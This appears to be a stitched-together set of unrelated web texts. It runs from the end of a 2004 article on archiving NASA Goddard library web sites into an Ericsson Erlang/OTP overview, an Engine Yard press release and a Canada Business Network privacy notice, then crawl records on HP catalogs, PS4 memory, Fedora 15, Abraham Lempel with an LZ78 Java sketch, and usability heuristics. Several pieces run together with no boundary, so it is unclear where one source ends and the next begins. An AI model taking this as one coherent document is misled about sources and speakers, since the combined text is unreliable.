In a recent pilot project, the GSFC Library incorporated metadata from videos, images, web sites and project documents into a single repository that can be searched simultaneously using the Lucene search engine and displayed from a single interface.
4.4 The Longer-Term Vision
The activities described above focus on creating a web site archive. However, the ultimate goal is to preserve the sites that are captured and make them permanently accessible into the future. As with many other projects, the focus has been on capturing the materials before they are lost rather than on preservation strategies [19]. However, ultimately the technologies on which these web sites are built will be replaced with new versions and even newer technologiesgoing beyond the web as we now know it. To ensure continued availability of these knowledge assets to the GSFC community, the GSFC Library is working closely with others in the area of preservation to determine how to preserve the captured web sites once they are no longer maintained by the current owners or curators. Appropriate preservation strategies, preservation metadata to ensure long-term management, and access and rights management control must be developed in order to accomplish this.
This work was conducted under NASA Goddard Contract NAS5-01161. The authors gratefully acknowledge the support and encouragement of Janet Ormes and Robin Dixon of the NASA Goddard Space Flight Center Library.
Notes and References
[1] Helsinki University and Center for Scientific Computing in Finland. "Functional and Technical Requirements for Capturing Online Documents" (EVA-Project). No Date.
[2] Royal Library of Sweden. Kulturarw3. [Online]. Available: <http://www.kb.se/kw3/ENG/Description.htm> [April 20, 2004].
[3] National Library of Australia. (2003a). "Collecting Australian Online Publications." [Online]. Available: <http://pandora.nla.gov.au/BSC49.doc> [April 20, 2004].
[4] Internet Archive. (2001). "Internet Archive: Building an 'Internet Library'". [Online]. Available: <http://www.archive.org> [April 20, 2004].
[5] Day, M. (2003). "Collecting and Preserving the World Wide Web: A Feasibility Study Undertaken for the JISC and Wellcome Trust." [Online]. Available: <http://library.wellcome.ac.uk/assets/WTL039229.pdf> [April 30, 2004].
[6] Rafabot is copyrighted by Spadix Software. [Online]. Available: <http://www.spadixbd.com/rafabot/>.
[7] Dublin Core Metadata Initiative. "Dublin Core Metadata Element Set 1.1." [Online]. Available: <http://www.dublincore.org/documents/dces/> [April 20, 2004].
[8] Hodge, G., T. Templeton, et al. "A Metadata Element Set for Project Documentation." Science & Technology Libraries. [In press].
[9] Goddard Core Descriptive Metadata Element Set. [Online]. Available: <http://library.gsfc.nasa.gov/mrg/htm/ReduceCore(Format)_10-19-04.htm> [November 5, 2004].
[10] Web Data Extractor is copyrighted by the WebExtractor System. [Online]. Available: <http://www.webextractor.com/> [May 25, 2004].
[11] Jakarta Lucene open source software from Apache Jakarta. [Online]. Available: <http://jakarta.apache.org/lucene/docs/index.html> [May 19, 2004].
[12] International Internet Preservation Consortium. Deep Web Working Group.
[13] WebWhacker is copyrighted by Blue Squirrel. [Online]. Available: <http://www.bluesquirrel.com/products/whacker/index.html> [May 25, 2004].
[14] BackStreet is copyrighted by Spadix Software. [Online]. Available: <http://www.spadixbd.com/backstreet/> [May 25, 2004].
[15] ImageMagick is copyrighted by ImageMagick Studio LLC. [Online]. Available: <http://www.imagemagick.org/> [May 25, 2004].
[16] Automatic Metadata Generation Section: DSpace (October 21, 2003). [Online]. Available: <http://scoop.dspace.org/story/2003/10/21/124126/09> [May 19, 2004].
[17] PDF Box. [Online]. Available: <http://www.pdfbox.org/> [May 19, 2004].
[18] Open Archives Initiative Protocol for Metadata Harvesting (OAI-PMH) v. 2.0. [Online]. Available: <http://www.openarchives.org/OAI/openarchivesprotocol.html#Repository> [May 19, 2004].
[19] Hodge, G. & E. Frangakis. "Digital Preservation and Permanent Access to Scientific Information: The State of the Practice." Joint Report for ICSTI/CENDI. March 2004. [Online]. Available: <http://cendi.dtic.mil/publications/04-3dig_preserv.pdf> [April 20, 2004].
Copyright © 2004 Alessandro Senserini, Robert B. Allen, Gail Hodge, Nikkia Anderson, and Daniel Smith, Jr.
doi:10.1045/november2004-hodge
Ericsson AB
Erlang and Erlang/OTP Overview
Last revised May 9, 2000
Erlang/OTP is a middleware for efficient development of competitive high availability systems. It is written mainly in the Erlang language and is used in Ericsson products such as AXD301, DWOS, A910 and ANx. Erlang/OTP is available for Solaris, Linux, Windows 9x/NT and VxWorks.
Erlang was created by the Computer Science Laboratory at Ellemtel (nowadays Ericsson Utvecklings AB) and has now been around for more than ten years. It originates from an attempt to find the most suitable programming language for telecom applications. Examples of characteristics for such an application are:
Concurrency - Several (thousands!) of things, say phone calls, happening simultaneously.
Robustness - An error occurring in one part of the application must be caught and handled in such a way that it does not interrupt other parts of the application. And preferably, no errors at all should occur!
Distribution - The system must be distributed over several computers, either due to the inherent distribution of the application, or for robustness or efficiency reasons.
Although most of the investigated languages had many suitable features, they all also had their drawbacks. The idea behind Erlang was to combine the good features of these languages into one language. Erlang has a process concept for supporting massive concurrency. Each process has its own memory, which grows and shrinks dynamically. Communication with other processes is achieved by sending and receiving messages. A built-in error detection mechanism makes it possible to catch errors within and between processes and to restart faulty parts of a program. It is also possible to update code for a running process. Erlang programs can be run on a single node or distributed over several nodes. Process communication and error detection have the same properties whether distributed or not.
Like Java, Erlang code is compiled into a byte code that is interpreted by a virtual machine. This makes the Erlang code platform-independent. Only the run-time system must be ported for the program to run on another kind of host. It also makes it possible to run different parts of a distributed system on completely different kinds of hardware.
An important difference between Java and Erlang, however, is that Erlang is a functional, high-level language. The Erlang language features and characteristics, and the virtual machine concept, make it useful for complex control systems with soft real-time constraints, which is exactly what it was designed for.
Openness is Critical
A programming language is not enough however. Short time to market and openness to sourced hardware and software are critical aspects in today's product development. Therefore, in 1996, OTP was created.
OTP stands for Open Telecom Platform, but is more accurately a middleware aimed at efficient development of competitive telecom applications. OTP consists of an Erlang run-time system, a number of ready-to-use components, and a set of design principles for Erlang programs. Since Erlang is the basis of OTP, the term Erlang/OTP is normally used instead of just OTP.
OTP can be said to be open in three different ways: to different hardware/operating systems due to the platform independence, to programs written in other languages due to the built-in interoperability mechanisms, and to different protocols due to components providing support for HTTP, SNMP, IIOP, FTP, TCP/IP and more.
Help With Design
When developing a product by using Erlang/OTP, the idea is to view the system as a number of services. Examples of services could be a database for storing telephone numbers or handling of call control signalling.
The OTP design principles give a standard way to implement each such service as a self-contained so-called application. The system is then put together by choosing the OTP components needed and adding the user-defined applications.
Applications share a common management interface that makes it possible to generate scripts for system start-up and run-time code replacement. Normally, each application is a tree-like process hierarchy with a pre-defined error detection scheme. The processes are implemented using behaviours, which are formalizations of design patterns with built-in support for error handling, tracing and code replacement.
OTP Components
Examples of important components are:
· Mnesia - a distributed database management system, appropriate for telecommunications applications and other Erlang applications that require continuous operation and exhibit soft real-time properties.
· Orber - an Erlang implementation of a CORBA object request broker.
· SNMP - a bilingual SNMP-extensible agent, featuring a MIB compiler and facilities for implementing SNMP MIBs.
There are also components for interfacing and communication, including an IDL compiler, low-level C and Java interfaces and a web server.
Engine Yard Triples Customer Base in 6 Months to Reach 1,000th Customer Milestone
Rapid Adoption of Public Platform-as-a-Service Offering Powers Company Growth
SAN FRANCISCO – March 11, 2010 – Engine Yard, the leader in Ruby on Rails automation and management technologies, today announced the company’s customer base has tripled in size in the last 6 months. With more than 1,000 customers, Engine Yard Cloud is the leading destination for business-critical applications built with Ruby on Rails. The company’s momentum has been fueled by the success of Ruby on Rails applications across many industries, with concentrations in social gaming and mobile applications.
"Engine Yard provides the scalability we need to provide customer support communities for tens of thousands of companies and easily scale to millions of monthly unique users," said Thor Muller, CTO and Co-founder of Get Satisfaction. "We rely on Engine Yard Cloud and the company’s expertise in Ruby on Rails to keep our sites available 24x7. Having visibility into operations performance and monitoring takes the heat off our developers, so they can focus on product development."
The past year at Engine Yard has been filled with key milestones, including:
The launch of the company’s public Platform-as-a-Service (PaaS) cloud offering. The Engine Yard PaaS has enjoyed rapid adoption by development teams because it removes the operational costs of managing technology infrastructure and significantly reduces application deployment and management expenses. This allows developers to spend more time building revenue-generating applications.
Closing $19 million in Series C funding. This round of funding has enabled Engine Yard to take Ruby on Rails deeper into the enterprise. Engine Yard continues to build out the Engine Yard Cloud to meet enterprise requirements, build support offerings for JRuby development teams, and continue to invest in the open source projects that are bringing new levels of productivity to developers worldwide.
"The introduction of our public cloud capabilities as a complement to our private cloud has allowed Engine Yard to meet a wider range of needs for organizations that see the value in bringing revenue-generating applications to market faster," said John Dillon, CEO of Engine Yard. "By using the Engine Yard Platform-as-a-Service, development teams are achieving cost savings and productivity gains because they no longer fight against the operational drag caused by application management issues and infrastructure headaches."
Engine Yard offers private and public Platform-as-a-Service (PaaS) cloud offerings that remove the drag of managing technology infrastructure and reduce application deployment and management expenses. This allows developers who use Engine Yard for their Rails-based applications to focus on their true passion – building great applications. With full-time contributors to Rails, JRuby and Rubinius – Engine Yard offers developers and businesses unmatched expertise for managing and deploying next-generation web applications.
For more information about Engine Yard product and service offerings, visit www.engineyard.com or call (866) 518-YARD.
About Engine Yard
Engine Yard is the leading provider of automation technologies and services for Ruby on Rails, including the Engine Yard Cloud, a Platform-as-a-Service (PaaS) for web developers and web teams. It provides easy-to-use, automated Rails application deployment and management, with a design philosophy that allows easy migration of existing applications. Engine Yard helps development teams realize productivity gains and cost savings by eliminating the operational overhead caused by application deployment issues and managing complex infrastructures. A significant contributor to the advancement of Open Source projects, Engine Yard employs top industry experts and sponsors or directly contributes to many projects such as Ruby on Rails, JRuby and Rubinius. Headquartered in San Francisco, Calif., Engine Yard is backed by Benchmark Capital, New Enterprise Associates, and Amazon.com.
Horn Group for Engine Yard
Sabrina Cook
[email protected]
Theresa Maloney
Cogenta Communications for Engine Yard
[email protected]
Copyright © Engine Yard, Inc. All rights reserved.
Terms and conditions
The Government of Canada and the Canada Business Network are committed to providing websites that respect the privacy of visitors. This privacy notice summarizes the privacy practices for the Canada Business Network's online activities.
All personal information collected by this institution is governed by the Privacy Act. This means that you will be informed of the purpose for which your personal information is being collected and how to exercise your right of access to that information.
Your privacy and the Internet
The nature of the Internet is such that Web servers automatically collect certain information about a visit to a website, including the visitor’s Internet Protocol (IP) address. IP addresses are unique numbers assigned by Internet Service Providers (ISP) to all devices used to access the Internet. Web servers automatically log the IP addresses of visitors to their sites. The IP address, on its own, does not identify an individual. However, in certain circumstances, such as with the co-operation of an ISP for example, it could be used to identify an individual using the site. For this reason, the Government of Canada considers the IP address to be personal information, particularly when combined with other data automatically collected when visitor requests a Web page such as the page or pages visited, date and time of the visit.
Unless otherwise noted, the Canada Business Network does not automatically gather any specific information from you, such as your name, telephone number or email address. The Canada Business Network would obtain this type of information only if you supply it to us, for example, by email or by filling in a contact form. In such cases, how your personal information is handled will be provided in a Personal Information Collection Statement.
In cases where services are provided by organizations outside of the Government of Canada, such as social media platforms or mobile applications, IP addresses may be recorded by the Web server of the third-party service provider.
Communicating with the Government of Canada
If you choose to send the Canada Business Network an email or complete a feedback form online, your personal information is used by the Canada Business Network in order to respond to your inquiry. The information you provide will only be shared with another government institution if your inquiry relates to that institution. The Canada Business Network does not use the information to create individual profiles nor does it disclose the information to anyone other than to those in the federal government who need to provide you with a response. Any disclosure of your personal information is in accordance with the Privacy Act.
Emails and other electronic methods used to communicate with the Government of Canada are not secure unless it is specifically stated on a Web page. Therefore, it is recommended that you do not send sensitive personal information, such as your Social Insurance Number or your date of birth, through non-secure electronic means.
Personal information from emails or completed feedback forms is collected pursuant to the provision in Industry Canada’s enabling statutes. Such information may be used for statistical, evaluation and reporting purposes and is included in personal information bank PSU 914 - Public Communications.
Third-party social media
The Canada Business Network’s use of social media serves as an extension of its presence on the Web. Social media account(s) are public and are not hosted on Government of Canada servers. Users who choose to interact with us via social media should read the terms of service and privacy policies of these third-party service providers and those of any applications you use to access them. The Canada Business Network uses Facebook, Twitter, and YouTube.
Personal information that you provide to the Government of Canada via social media account(s) is collected under the authority of the provision in Industry Canada’s enabling statutes. This information is collected to capture conversations (e.g. questions and answers, comments, “likes”, retweets) between you and the Canada Business Network. It may be used to respond to inquiries, or for statistical, evaluation and reporting purposes. Comments posted that violate Canadian law will be deleted and disclosed to law enforcement authorities. Comments that violate our rules of engagement will also be deleted. The personal information is included in personal information bank PSU 938 - Outreach Activities.
Improving your experience on Government of Canada websites
Digital markers (including cookies)
A digital marker is a resource created by the visitors’ browser in order to remember certain pieces of information for the Web server to reference during the same or subsequent visit to the website. Examples of digital markers are “cookies” or HTML5 web storage. Some examples of what digital markers do are as follows:
They allow a website to recognize a previous visit each time the visitor accesses the site
They track what information is viewed on a site which helps website administrators ensure visitors find what they are looking for.
The Canada Business Network uses sessional and persistent digital markers on some portions of its website. During your on-line visit, your browser exchanges data with the Canada Business Network’s Web server. The digital markers used do not allow the Canada Business Network to identify individuals.
You may adjust your browser settings to reject digital markers, including cookies, if you so choose. However, it may affect your ability to interact with the Canada Business Network’s website.
Web analytics
Web analytics is the collection, analysis, measurement, and reporting of data about Web traffic and visits for purposes of understanding and optimizing Web usage. Information in digital markers may be used for the purpose of web analytics to remember your online interactions with the Canada Business Network's website.
The Canada Business Network uses Google Analytics to improve its web site. When your computer requests a Canada Business Network Web page, our institution collects the following types of information for Web analytics:
Originating IP address
Date and time of the request
Type of browser used
Page(s) visited
The Canada Business Network uses Google Analytics and the information collected is disclosed to Google Inc., an external third party service provider. Your IP address is anonymized prior to being stored on the service provider's servers in order to help safeguard your privacy. The information collected is de-personalized by activating the anonymization feature in Google Analytics.
Data collected for Web analytics purposes goes outside of Canada to the United States and may be subject to the governing legislation of that country, the USA Patriot Act.
Information used for the purpose of Web analytics is collected pursuant to Industry Canada's enabling statutes. Such data may be used for communications and information technology statistical purposes, audit, evaluation, research, planning and reporting. For more information on how your privacy is safeguarded in relation to web analytics, see the Standard on Privacy and Web Analytics.
Protecting the security of Government of Canada websites
The Canada Business Network employs software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage. This software receives and records the IP address of the computer that has contacted our website, the date and time of the visit and the pages visited. We make no attempt to link these addresses with the identity of individuals visiting our site unless an attempt to damage the site has been detected.
This information is collected pursuant to section 161 of the Financial Administration Act. The information may be shared with appropriate law enforcement authorities if suspected criminal activities are detected. Such information may be used for network security related statistical purposes, audit, evaluation, research, planning and reporting and is included in personal information bank PSU 939 - Security Incidents.
Inquiring about these practices
Any questions, comments, concerns or complaints you may have regarding the administration of the Privacy Act and privacy policies regarding the Canada Business Network’s Web presence may be directed to our Access to Information and Privacy Coordinator by email to [email protected], by calling 613-952-2088 or writing to:
Information and Privacy Rights Administration
2nd Floor, West Tower
C.D. Howe Building
235 Queen Street
Ottawa, ON K1A 0H5
If you are not satisfied with our response to your privacy concern, you may wish to contact the Office of the Privacy Commissioner by telephone at 1-800-282-1376.
Using files located on non-Government of Canada servers
To improve the functionality of Government of Canada websites, certain files (such as open source libraries, images and scripts) may be delivered automatically to your browser via a trusted third-party server or content delivery network. The delivery of these files is intended to provide a seamless user experience by speeding response times and avoiding the need for each visitor to download these files. Where applicable, specific privacy statements covering these files are included in our Privacy Notice.
Providing content in Canada's official languages
The Official Languages Act, the Official Languages (Communications with and Services to the Public) Regulations and Treasury Board policy requirements establish when we use both English and French to provide services to or communicate with members of the public. When there is no obligation to provide information in both official languages, content may be available in one official language only. Information provided by organizations not subject to the Official Languages Act is in the language(s) provided. Information provided in a language other than English or French is only for the convenience of our visitors.
Linking to non-Government of Canada websites
Links to websites not under the control of the Government of Canada, including those to our social media accounts, are provided solely for the convenience of our website visitors. We are not responsible for the accuracy, currency or reliability of the content of such websites. The Government of Canada does not offer any guarantee in that regard and is not responsible for the information found through these links, nor does it endorse the sites and their content.
Visitors should also be aware that information offered by non-Government of Canada sites to which this website links is not subject to the Privacy Act or the Official Languages Act and may not be accessible to persons with disabilities. The information offered may be available only in the language(s) used by the sites in question. With respect to privacy, visitors should research the privacy policies of these non-government websites before providing personal information.
Ownership and usage of content provided on this site
Materials on this website were produced and/or compiled by the Canada Business Network for the purpose of providing Canadians with access to information about the programs and services offered by the Government of Canada. You may use and reproduce the materials as follows:
Non-commercial reproduction
Unless otherwise specified you may reproduce the materials (excluding images) in whole or in part for non-commercial purposes, and in any format, without charge or further permission, provided you do the following:
Exercise due diligence in ensuring the accuracy of the materials reproduced;
Indicate both the complete title of the materials reproduced, as well as the author (where available); and
Indicate that the reproduction is a copy of the version available at CanadaBusiness.gc.ca.
Images may not be reproduced in whole or in part.
Commercial reproduction
Unless otherwise specified, you may not reproduce materials on this site, in whole or in part, for the purposes of commercial redistribution without prior written permission from Industry Canada.
To obtain permission to reproduce Government of Canada materials on this site for commercial purposes, Apply for Crown Copyright Clearance or write to:
Communications and Marketing Branch
Email: [email protected]
You may also contact us to obtain additional information concerning copyright ownership and restrictions, as some of the content on this site may be subject to the copyright of another party. Where information has been produced or copyright is not held by Government of Canada, the materials are protected under the Copyright Act and international agreements. Details concerning copyright ownership are indicated on the relevant page(s).
The official symbols of the Government of Canada, including the Canada Wordmark, the Arms of Canada, and the flag symbol may not be reproduced, whether for commercial or non-commercial purposes, without prior written authorization.
Our commitment to accessibility
The Government of Canada is committed to achieving a high standard of accessibility as defined in the Standard on Web Accessibility and the Standard on Optimizing Websites and Applications for Mobile Devices. In the event of difficulty using our Web pages, applications or device-based mobile applications, please contact us for assistance or to obtain alternative formats such as regular print, Braille or another appropriate format.
Social media terms of use
This notice has been written to explain how the Canada Business Network interacts with the public on social media platforms.
Content and frequency
We use our social media accounts as an alternative method of sharing the content posted on our website and interacting with our stakeholders. By following our social media accounts (by “following,” “liking” or “subscribing”), you can expect to see information about the programs and services we provide.
We understand that the Web is a 24/7 medium, and your comments are welcome at any time. You should expect to see new content posted Monday to Friday from 8:00 a.m. to 6:00 p.m. EST/EDT. Comments submitted after hours or on weekends will be read and responded to as soon as possible.
Because the servers of social media platforms are managed by a third party, our social media accounts are subject to downtime that may be out of our control. As such, we accept no responsibility for platforms becoming unresponsive or unavailable.
Links to other websites and ads
Our social media accounts may post or display links or ads for websites that are not under our control. These links are provided solely for the convenience of users. The Government of Canada is not responsible for the information found through these links or ads, nor does it endorse the sites or their content.
Following, "favouriting" and subscribing
Our decision to “follow,” “favourite” or “subscribe” to another social media account does not imply an endorsement of that account, channel, page or site, and neither does sharing (re-tweeting, reposting or linking to) content from another user.
Comments and interaction
We will read comments and participate in discussions when appropriate. We ask that your comments be relevant and respectful. We reserve the right to delete comments that violate this notice, and the user may be blocked and reported to prevent further inappropriate comments.
We cannot engage in issues of party politics or answer questions that break the rules of this notice.
We reserve the right to edit or remove comments that:
Contain personal information;
Are contrary to the principles of the Canadian Charter of Rights and Freedoms;
Express racist, hateful, sexist, homophobic, slanderous, insulting or life-threatening messages;
Put forward serious, unproven or inaccurate accusations against individuals or organizations;
Are aggressive, coarse, violent, obscene or pornographic;
Are offensive, rude or abusive to an individual or an organization;
Are not sent by the author or are put forward for advertising purposes;
Encourage illegal activity;
Contain announcements from labour or political organizations;
Are written in a language other than English or French;
Are unintelligible or irrelevant;
Are repetitive or spam; and
Do not, in our opinion, add to the normal flow of the discussion.
In short, please be respectful and make sure that your comments are relevant to where they are posted. The views of users commenting on our social media accounts do not necessarily represent the views of the Canada Business Network or the Government of Canada.
Accessibility of social media platforms
Social media platforms are third-party service providers and are not bound by Government of Canada standards for Web accessibility.
If you have difficulty accessing content on our social media accounts, please contact us and we will try to solve the problem or provide you with the information in a different format.
Information that we post is subject to the Copyright Act.
Our social media accounts are not Government of Canada websites and represent only our presence on third-party service providers.
For more information, please refer to our Privacy Notice regarding third-party social media.
Many social media platforms have multiple language options and provide instructions on how to set your preferences. The Government of Canada respects the Official Languages Act and is committed to ensuring that our information is available in both French and English and that both versions are of equal quality.
We reply to comments in the official language in which they are posted. If we think the response is a question of general public interest, we may respond in both official languages.
We may share links that direct users to sites of organizations or other entities that are not subject to the Official Languages Act and available only in the language(s) in which they are written. When content is available in only one language, we make an effort to provide similar content in the other official language.
Questions and media requests
Reporters are asked to send questions to:
Email: [email protected]
Business hours (Eastern Time): 7:30 a.m. to 6 p.m.
Information on this website comes from third parties, including many different federal departments and agencies, as well as external sources and other levels of government. Every effort is made to ensure the accuracy, currency and reliability of the content. Users who wish to use this information or to avail themselves of the services may contact the Canada Business Network centre in their province or territory using the toll-free lines, and a business information officer will be pleased to help.
2015-48/3680/en_head.json.gz/8717 | Last year, Hewlett Packard Company announced it will be separating into two industry-leading public companies as of November 1st, 2015. HP Inc. will be the leading personal systems and printing company. Hewlett Packard Enterprise will define the next generation of infrastructure, software and services.
Public Sector eCommerce is undergoing changes in preparation for and in support of this separation. You will still be able to purchase all the same products, but your catalogs will be split into two: Personal Systems, Printers and Services; and Servers, Storage, Networking and Services. Please select the catalog below that you would like to order from.
Note: Each product catalog has separate shopping cart and checkout processes.
Personal Computers and Printers
Select here to shop for desktops, workstations, laptops and netbooks, monitors, printers and print supplies.
Servers, Storage, Networking and Services
Select here to shop for Servers, Storage, Networking, Converged Systems, Services and more.
Privacy Statement | Limited Warranty Statement | Terms of Use ©2015 Hewlett Packard Development Company, L.P | 计算机 |
2015-48/3680/en_head.json.gz/10324 | Game Developer Applauds 8GB of Memory on PlayStation 4 Game Console
Lead Level Designer of Dishonored Calls PS4's 8GB of Memory a “Joy”
by Anton Shilov
03/08/2013 | 12:41 PM
Modern video games require a lot of memory not only to store things like textures and various graphics-related data, but also to store a lot of information about game levels and many other things. It is not surprising, then, that game developers praise Sony Corp. for installing 8GB of GDDR5 memory into the upcoming PlayStation 4 game console.
“As a level designer we are struggling against memory every day. We cut things, we remove things, we strip things, we split the levels, we remove NPCs from levels because there's not enough memory. So knowing that memory is something that is going to be improved in the next generation of consoles: to us, it is a joy. It is something that we were waiting for,” said Christophe Carrier, a lead level designer at Arkane Studios, who worked on Dishonored video game, in an interview with Eurogamer web-site.
Current-generation video-game consoles from Microsoft and Sony have 512MB of random access memory, a catastrophically insufficient amount by today's standards. As a result of that insufficient amount of memory, many games look and feel much better on the PC, where developers do not have to cut down objects or levels in a bid to enable a smooth frame rate. The majority of gaming PCs today have from 4GB to 8GB of memory. The next-generation game consoles will also feature 8GB of random access memory.
“We were PC gamers at the beginning. We love PC games, and we had to make games on consoles. But the main problem was memory. The processors are good, but the memory, for our games, is the most important. So [8GB] is great,” said Mr. Carrier.
Besides loads of memory, the Sony PlayStation 4 platform offers a number of other innovations, such as a heterogeneous multi-core AMD Fusion system-on-chip with eight x86 general-purpose cores as well as a custom AMD Radeon HD graphics core with 1152 stream processors, Gaikai-powered social features and so on. It remains to be seen how and where Arkane Studios will utilize those advanced technologies.
“We are looking forward at how we can integrate all those things into our [next] game,” said Dinga Bakaba, Dishonored game designer and associate producer. | 计算机 |
2015-48/3680/en_head.json.gz/10911 | release date:May 24, 2011
The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 DVD for installation on an x86 platform
2015-48/3681/en_head.json.gz/233 | ETHW
Engineering and Technology History Wiki
Abraham Lempel
Abraham Lempel is considered a pioneer in data compression. In 1977 and 1978, Dr. Lempel and his colleague, Professor Jacob Ziv, invented the first two iterations of the Lempel-Ziv (LZ) Data Compression Algorithm. Since then, the LZ Algorithm and its derivatives have become some of the most widely used data compression schemes, making the use of loss-less data compression pervasive in day-to-day computing and communication. With this compression method, information is transmitted and stored over the Internet and stored more efficiently on computer networks and other types of media storage. Dr. Lempel’s academic career spans more than 40 years, having taught both electrical engineering and computer science at Technion, the Israel Institute of Technology, from 1963 to 2004. He has held the title of full professor since 1977 and served as head of the Technion computer science department from 1981 to 1984. Dr. Lempel joined Hewlett-Packard Labs in 1993, and a year later, established HP Labs Israel, where he currently serves as director, overseeing the development of fundamental and universal image processing tools, as well as application-driven customization. An IEEE Fellow, HP Senior Fellow and Erna and Andrew Viterbi Professor Emeritus, Dr. Lempel holds eight U.S. patents, and has authored over 90 published works on data compression and information theory. He has received numerous awards and honors from the IEEE and other industry organizations. In 2004, the IEEE Executive Committee and History Committee proclaimed the LZ Algorithm to be an IEEE milestone for enabling the efficient transmission of data via the Internet.
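As a rough, hypothetical illustration of the dictionary-building idea behind the LZ family, here is a simplified LZ78-style sketch in Java; it is not Lempel and Ziv's original formulation and not any production codec:

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/** Minimal LZ78-style encoder: emits (dictionary index, next character) pairs. */
public class LZ78Sketch {

    /** One output token: index of the longest known phrase, plus the character that follows it. */
    record Token(int prefixIndex, char nextChar) {}

    static List<Token> encode(String input) {
        Map<String, Integer> dictionary = new HashMap<>(); // phrase -> index (0 means "empty prefix")
        List<Token> output = new ArrayList<>();
        String phrase = "";

        for (char c : input.toCharArray()) {
            String candidate = phrase + c;
            if (dictionary.containsKey(candidate)) {
                phrase = candidate;                               // keep extending the current match
            } else {
                int prefixIndex = phrase.isEmpty() ? 0 : dictionary.get(phrase);
                output.add(new Token(prefixIndex, c));            // emit (known prefix, new character)
                dictionary.put(candidate, dictionary.size() + 1); // learn the new, longer phrase
                phrase = "";
            }
        }
        if (!phrase.isEmpty()) {                                  // flush a trailing match; '\0' = "no next char"
            output.add(new Token(dictionary.get(phrase), '\0'));
        }
        return output;
    }

    public static void main(String[] args) {
        // Repetitive input compresses well: later tokens stand for ever-longer phrases.
        System.out.println(encode("abababababa"));
    }
}
```

Widely used derivatives — LZW on the LZ78 side, and the sliding-window LZ77 variants behind formats such as ZIP and PNG — build on this same core idea of replacing repeated strings with references to earlier occurrences.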
2015-48/3681/en_head.json.gz/653 | Debating the Fundamentals : The geographic, temporal and political nature of usability heuristics
The debates between specific usability heuristics will come to shape your career as a designer.
Article No. 727 | September 8, 2011 | by Alex Faaborg
Usability heuristics are each hailed as irrefutably true. They serve as our shared vocabulary for expressing why an interface is good or bad, and as an effective tool for teaching people about interactive design. In isolation, each heuristic presents an obvious path towards creating an optimal design. Showing feedback is better than not showing feedback, providing access to help is better than not providing access to help, and preventing an error is better than not preventing an error. On the surface, usability heuristics provide a simple checklist for making any interface perfect.

But what is fascinating about them is the extent to which all of the heuristics are actually in direct opposition to each other, the extent to which they are geographic and temporal, and the extent to which they expose the designer's underlying political views (at least in the domain of things digital). Usability heuristics present a zero-sum game with inherent tradeoffs, and it is simply impossible to achieve all of the heuristics simultaneously.

The debates between specific usability heuristics will come to shape your career as a designer. While every interface has a different purpose and context, I believe the underlying debates ultimately remain the same. And just like all great human debates, these are shaped by geography, time, and politics.

Geography: Simplicity Versus Complexity
Perhaps the most immediately obvious contention in Nielsen's usability heuristics is that simplicity carries different connotations in different geographic regions. In Western cultures, simplicity has a very positive connotation: a simple object is viewed as being elegant and sleek. However, in Eastern cultures this emotional affiliation is reversed: complexity has a positive connotation that leads to thoughts of an object being powerful and functional. This effect doesn't just apply to industrial design, but to software as well.

Firefox's localization in China doesn't just translate the language of the interface, but also the interactive design. Unlike Western localizations of Firefox, the Chinese localization includes a plethora of additional functionality. The interface contains a window with constantly updating contextual information based on the information you've selected. It's designed for browsing the Web while simultaneously streaming television and music in the background. It has a button for quickly launching a calculator. While a Western user might see these extra features as unnecessary and cluttered, users in China appreciate them.

Time: Recognition Versus Recall
One of the heuristics that drives increased complexity in graphical interfaces (which isn't always bad) asserts that recognition is better than recall (which isn't always true). While recognition (seeing something) is commonly considered superior to recall (remembering something), there's a caveat. If the user already remembers what he wants, showing him additional options may slow him down as he considers the various alternative options. Recognition wins in terms of users eventually finding something, but it loses in terms of creating the fastest and most efficient interface.

Google's homepage is the epitome of both simplicity and efficiency: a blank white page with a single field. When you focus the field, there is only a flashing cursor. You are alone with your thoughts; there are no distractions. In contrast, Bing provides a daily image with explorable regions containing factoids.
When you click in the search field, it provides suggestions based on what people are searching on now, including popular culture entertainment news like "Lady Gaga Howard Stern" and "Julianne Hough." Which interface is better? It depends on how bored the user is. But it also depends on how bored you want the user to be. Do you want the user to be curious or passive? If the user already knows what she wants to search for, these types of alternative targets will likely slow her down.

Another consideration is efficiency. Users selecting their intention with a mouse are considerably slower than users entering their intention with a keyboard. This is due to the physical constraints of the input devices, the cognitive load being placed on users when presented with options they don't actually want, and the relative search spaces of graphical objects on the screen versus any sequence of characters. When it comes to efficiency, recognition is not always better than recall. Consider the interfaces being used by ticket agents in airports. In the 1980s, they were fast, textual, and keyboard-based. Modern replacements are more commonly slow, graphical, and mouse-based. Watch your ticket agent's eyes narrow slightly in frustration as he reaches for the mouse.

Time: Consistency Versus New
If recognition versus recall is a tradeoff in small amounts of time (seconds per interaction), then consistency is a tradeoff in large amounts of time (years between product releases). It's hard to find a designer who will argue against consistency; leveraging users' existing knowledge can bootstrap their adoption of a product. Documented interface guidelines help establish a core set of common interaction patterns that should be shared between applications. But the problem with enforcing this sort of consistency is it inhibits innovation.

Unlike desktop applications, which have large widget libraries and well-established UI guidelines, the Web provides designers with a blank canvas and only the most basic interactive widgets. While the interactive design of desktop applications is generally pretty consistent, the Web has a very high variability. The lack of guidelines and direction for web applications has resulted in an extremely broad range of quality. Some web applications are absolutely awful and some, such as Gmail, are considerably better than their desktop competitors. The Outlook interface feels like it wasn't designed for managing your email as much as it was designed to mirror the interaction paradigms of applications like Word and Excel. UI widgets such as the tree, the splitter, the accordion, and the ribbon seem to be used primarily because they are available and familiar to users. But in interactive design, consistency doesn't guarantee a fantastic interface as much as it simply mitigates risk.

